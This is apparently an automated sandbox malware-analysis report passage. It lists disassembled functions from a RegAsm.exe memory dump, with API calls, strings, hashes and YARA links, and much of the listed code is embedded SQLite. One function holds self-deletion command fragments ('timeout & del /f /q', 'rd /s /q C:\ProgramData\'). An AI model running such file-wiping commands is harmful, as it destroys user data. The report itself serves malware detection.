Opcode Fuzzy Hash: 3e6b9d114787a1a332f1798f95a424b4bd73bd1f2c710322a75f048452b8da0f
Instruction Fuzzy Hash: A9A1C1B55003455BE3009B349C41BAA7799EF42325F5C4266ED88AB1C2E627EB0FC7B3

Function 19252BE0 Relevance: 31.8, APIs: 8, Strings: 10, Instructions: 346COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19252E69
WHERE name=%Q, xrefs: 19252DB7
ORDER BY name, xrefs: 19252DCC
API call with %s database connection pointer, xrefs: 19252E5A
SELECT * FROM (SELECT 'sqlite_schema' AS name,1 AS rootpage,'table' AS type UNION ALL SELECT name,rootpage,type FROM "%w".sqlite_schema WHERE rootpage!=0), xrefs: 19252DA4
NULL, xrefs: 19252E38
misuse, xrefs: 19252E73
%s at line %d of [%.10s], xrefs: 19252E78
invalid, xrefs: 19252E4E
unopened, xrefs: 19252E55

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: ORDER BY name$%s at line %d of [%.10s]$API call with %s database connection pointer$NULL$SELECT * FROM (SELECT 'sqlite_schema' AS name,1 AS rootpage,'table' AS type UNION ALL SELECT name,rootpage,type FROM "%w".sqlite_schema WHERE rootpage!=0)$WHERE name=%Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
API String ID: 0-1179878930
Opcode ID: c9a32279782aef19af6dabd42b5c00359aab8479f47dc1b1314823db98dd351a
Instruction ID: e2d8667b43aa4ac79954d8c8f152294ce4af97cb8c1da6636d2f97aa09375b6b
Opcode Fuzzy Hash: c9a32279782aef19af6dabd42b5c00359aab8479f47dc1b1314823db98dd351a
Instruction Fuzzy Hash: 88C134705043469BF710DF24D981BDB37A4AF42345F6D8528FC5BAB2C2E335E94687A2

Function 00408759 Relevance: 30.4, APIs: 20, Instructions: 407stringmemoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040875E

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004089AE
HeapAlloc.KERNEL32(00000000), ref: 004089B5
lstrcat.KERNEL32(00000000,00000000), ref: 00408AD8
lstrcat.KERNEL32(00000000,00425DDC), ref: 00408AE6
lstrcat.KERNEL32(00000000,00000000), ref: 00408AF8
lstrcat.KERNEL32(00000000,00425DE0), ref: 00408B06
lstrlenA.KERNEL32(00000000), ref: 00408C19
lstrlenA.KERNEL32(00000000), ref: 00408C27

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA

memset.MSVCRT ref: 00408C7F

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcat$lstrcpy$lstrlen$Heap$AllocCreateObjectProcessSingleSystemThreadTimeWaitmemset
String ID:
API String ID: 1592390033-0
Opcode ID: 53ad7f626d97f5cc4723212ab5bd4029736e441008517f7666fc9b004bd4ff82
Instruction ID: 517fb1482c7bf48e2daa8cc91bc62da6b68edd990b633fa38b7ec1900e684afa
Opcode Fuzzy Hash: 53ad7f626d97f5cc4723212ab5bd4029736e441008517f7666fc9b004bd4ff82
Instruction Fuzzy Hash: 11F15771804158EADB15EBE4DD1ABEEBB74AF18308F50407EE405B21E2DF782A09DB25

Function 004118AE Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 325stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004118B3
strtok_s.MSVCRT ref: 004118E4
StrCmpCA.SHLWAPI(?,true,?,?,00000104,?,00000104,?,?,00000000), ref: 0041197C

Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4

lstrcpy.KERNEL32(?,?), ref: 00411A33
lstrcpy.KERNEL32(?,00000000), ref: 00411A6F
lstrcpy.KERNEL32(?,00000000), ref: 00411AB6
lstrcpy.KERNEL32(?,00000000), ref: 00411AFD
lstrcpy.KERNEL32(?,00000000), ref: 00411B44
strtok_s.MSVCRT ref: 00411CA7

Strings

true, xrefs: 00411974
false, xrefs: 00411996

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s$H_prologlstrlen
String ID: false$true
API String ID: 49562497-2658103896
Opcode ID: 42b556ca287b3747ecbd8e606c3f76c76cceba898297701c297a24441a87d915
Instruction ID: db91816e4951f7301f92f20e3279e8c92673a629158fb1b6361f6b740d505876
Opcode Fuzzy Hash: 42b556ca287b3747ecbd8e606c3f76c76cceba898297701c297a24441a87d915
Instruction Fuzzy Hash: A1C182B190021DAFDF10EFE4D855EDE77B9AF18304F10446AF505A3191DF78AA89CB64

Function 19355D70 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 266COMMON

Download Yara Rule

Strings

rank, xrefs: 19355FBB
hashsize, xrefs: 19355DF0
pgsz, xrefs: 19355D81
usermerge, xrefs: 19355EAD
deletemerge, xrefs: 19355F64
automerge, xrefs: 19355E59
crisismerge, xrefs: 19355EF7
secure-delete, xrefs: 19356031

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: automerge$crisismerge$deletemerge$hashsize$pgsz$rank$secure-delete$usermerge
API String ID: 0-3330941169
Opcode ID: 405ef993e572f60bb46fb49eb1e7499336dda52dbe6d349afd8090f3cf9e4498
Instruction ID: 05ccd4693ddfee688053a85e5d30171a0295e709648c73cad61ae414254d6195
Opcode Fuzzy Hash: 405ef993e572f60bb46fb49eb1e7499336dda52dbe6d349afd8090f3cf9e4498
Instruction Fuzzy Hash: AA7157BAB002115BE601DA59FC00A9F77D4EF89212F0C087DF943C7391EB21F95A97A2

Function 00411CD8 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00411CDD
StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00416CD7), ref: 00411CFF
ExitProcess.KERNEL32 ref: 00411D0A
strtok_s.MSVCRT ref: 00411D21

Strings

block, xrefs: 00411CEA

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExitH_prologProcessstrtok_s
String ID: block
API String ID: 3745986650-2199623458
Opcode ID: 13831a635ab857e38a93760726639843a5c721726f6ccf8ed6f7a59b1ebdf2e0
Instruction ID: 11727e29856bce48e5725168b056cd054f1503323e09992035e8e95d40e30adb
Opcode Fuzzy Hash: 13831a635ab857e38a93760726639843a5c721726f6ccf8ed6f7a59b1ebdf2e0
Instruction Fuzzy Hash: F541E574A40312EADB109FF1EC45BEB37ACBB05B44B60443FFA07D2560E77899808B18

Function 19245E20 Relevance: 26.7, APIs: 8, Strings: 7, Instructions: 496COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19245F2B, 19246253, 19246385
recursive definition for %s.%s, xrefs: 19245E4C
API called with finalized prepared statement, xrefs: 19245F1F, 19246247, 19246379
misuse, xrefs: 19245F35, 1924625D, 1924638F
%s at line %d of [%.10s], xrefs: 19245F3A, 19246262, 19246394
no such fts5 table: %s.%s, xrefs: 192462EA
SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id', xrefs: 19245E6F

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id'$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such fts5 table: %s.%s$recursive definition for %s.%s
API String ID: 0-1070437968
Opcode ID: b9f32e7c37d494b58a526aa2c764bf4ae0961d5d1982c8d77d1a2a6dbfb931a4
Instruction ID: 5049119f93fe2bc40d8bd6730dbde7da63524f43aa531038340cdf8b63b61518
Opcode Fuzzy Hash: b9f32e7c37d494b58a526aa2c764bf4ae0961d5d1982c8d77d1a2a6dbfb931a4
Instruction Fuzzy Hash: 3502F4B4900746DFE724CF24CD84B5B77E4BF44718F284528E98A97382E775E908CBA2

Function 192B9980 Relevance: 24.9, APIs: 7, Strings: 7, Instructions: 429COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 192B9A35, 192B9D90
API called with NULL prepared statement, xrefs: 192B9A04
API called with finalized prepared statement, xrefs: 192B9A19, 192B9D84
no such function: %s, xrefs: 192B9E8C
misuse, xrefs: 192B9A3F, 192B9D9A
%s at line %d of [%.10s], xrefs: 192B9A44, 192B9D9F
SELECT %s, xrefs: 192B99B1

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such function: %s
API String ID: 0-3900766660
Opcode ID: f8dcbb97425cf86517868f2df699af14b112a90902c3d443120e1c26c816a1b0
Instruction ID: 5bb9426822ba9479d74485a4977c2579509628863b20635ca854d6d41268bd08
Opcode Fuzzy Hash: f8dcbb97425cf86517868f2df699af14b112a90902c3d443120e1c26c816a1b0
Instruction Fuzzy Hash: D1E1F5B8A047429BD710DF25D940B5B77E4AF45398F2C452CE88B9F381E735E905C7A2

Function 19273800 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 184COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19273930
no such rowid: %lld, xrefs: 192739F8
real, xrefs: 19273895, 192738EC
API called with finalized prepared statement, xrefs: 19273924
null, xrefs: 192738E7
misuse, xrefs: 1927393A
cannot open value of type %s, xrefs: 192738ED
%s at line %d of [%.10s], xrefs: 1927393F
integer, xrefs: 1927389A

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$cannot open value of type %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$integer$misuse$no such rowid: %lld$null$real
API String ID: 0-1477268580
Opcode ID: db511791b986e0f75252b0c46dd92dbb23884db2142b2768bf2b4072253589b0
Instruction ID: 92c6b433d122d36750af03a88b50ac7fd92efebd45058d0d4495c3a61a019d3c
Opcode Fuzzy Hash: db511791b986e0f75252b0c46dd92dbb23884db2142b2768bf2b4072253589b0
Instruction Fuzzy Hash: 7951EFB56043029FE718CF28EC81A66B3F4FF94315F18896DE956AB741E731E804CBA1

Function 004136E3 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004136E8
memset.MSVCRT ref: 00413708
memset.MSVCRT ref: 00413714
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 00413729

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

ShellExecuteEx.SHELL32(0000003C), ref: 004138B5
memset.MSVCRT ref: 004138C2
memset.MSVCRT ref: 004138D0
ExitProcess.KERNEL32 ref: 004138E1

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Strings

<, xrefs: 00413890
" & exit, xrefs: 00413856
" & exit, xrefs: 004137F2
/c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00413809
" & rd /s /q "C:\ProgramData\, xrefs: 0041379F
/c timeout /t 10 & del /f /q ", xrefs: 0041374F

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpymemset$H_prolog$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
API String ID: 1312519015-206210831
Opcode ID: 55572b1a904cb1af1763ca9e7bd8291c3d34ccd4c407e7393e9b41159a59be07
Instruction ID: 7cc86f5a3bc31e5bf112f7f201b24b9592421ec460c7ef1d8f903e98a033c0e4
Opcode Fuzzy Hash: 55572b1a904cb1af1763ca9e7bd8291c3d34ccd4c407e7393e9b41159a59be07
Instruction Fuzzy Hash: EF512DB1D0024DEEDB11EBE1C992ADEBBB8AF18304F50017EE505B3582DB785B48CB65

Function 1935F370 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 196COMMON

Download Yara Rule

Strings

config, xrefs: 1935F549
docsize, xrefs: 1935F52D
k PRIMARY KEY, v, xrefs: 1935F544
id INTEGER PRIMARY KEY, xrefs: 1935F43E
id INTEGER PRIMARY KEY, sz BLOB, xrefs: 1935F524, 1935F52C
content, xrefs: 1935F49D
version, xrefs: 1935F560
, c%d, xrefs: 1935F469
id INTEGER PRIMARY KEY, sz BLOB, origin INTEGER, xrefs: 1935F51C

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: , c%d$config$content$docsize$id INTEGER PRIMARY KEY$id INTEGER PRIMARY KEY, sz BLOB$id INTEGER PRIMARY KEY, sz BLOB, origin INTEGER$k PRIMARY KEY, v$version
API String ID: 0-3918257174
Opcode ID: c3d26eef71ac7fe251d2c45e3ced90ec8b38fb5d875f37d02f0b853e1428026c
Instruction ID: c3c1fa71170dc90f69872bfdb3ab521fc169196552ea626add131e0bc93568d6
Opcode Fuzzy Hash: c3d26eef71ac7fe251d2c45e3ced90ec8b38fb5d875f37d02f0b853e1428026c
Instruction Fuzzy Hash: A55126B29002559BE700DF24DC84F6B77A8EF48765F4D4628EC4A9B241E735EA05CBE1

Function 19378F40 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 177COMMON

Download Yara Rule

Strings

%!.15g, xrefs: 19378F83
%lld, xrefs: 1937900C
%!.20e, xrefs: 19378FF1
NULL, xrefs: 1937912E
NULL, xrefs: 19379148

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %!.15g$%!.20e$%lld$NULL$NULL
API String ID: 0-2115304644
Opcode ID: 0c9d660be2af5660673bf413c7aab28670472744d080162746acab6a28f494a2
Instruction ID: a8f3873b6b1aa01f09554da18392f91e9504f8365e668b3a461d0fe05389e066
Opcode Fuzzy Hash: 0c9d660be2af5660673bf413c7aab28670472744d080162746acab6a28f494a2
Instruction Fuzzy Hash: 965154759047109BD718DF28CC41AABB7E4FF85304F4D8B9DF89967242E339E60587A2

Function 19243420 Relevance: 21.4, APIs: 6, Strings: 6, Instructions: 392COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19243548, 19243594
API called with NULL prepared statement, xrefs: 19243517
ATTACH x AS %Q, xrefs: 1924346F
API called with finalized prepared statement, xrefs: 1924352C, 19243588
misuse, xrefs: 19243552, 1924359E
%s at line %d of [%.10s], xrefs: 19243557, 192435A3

Memory Dump Source

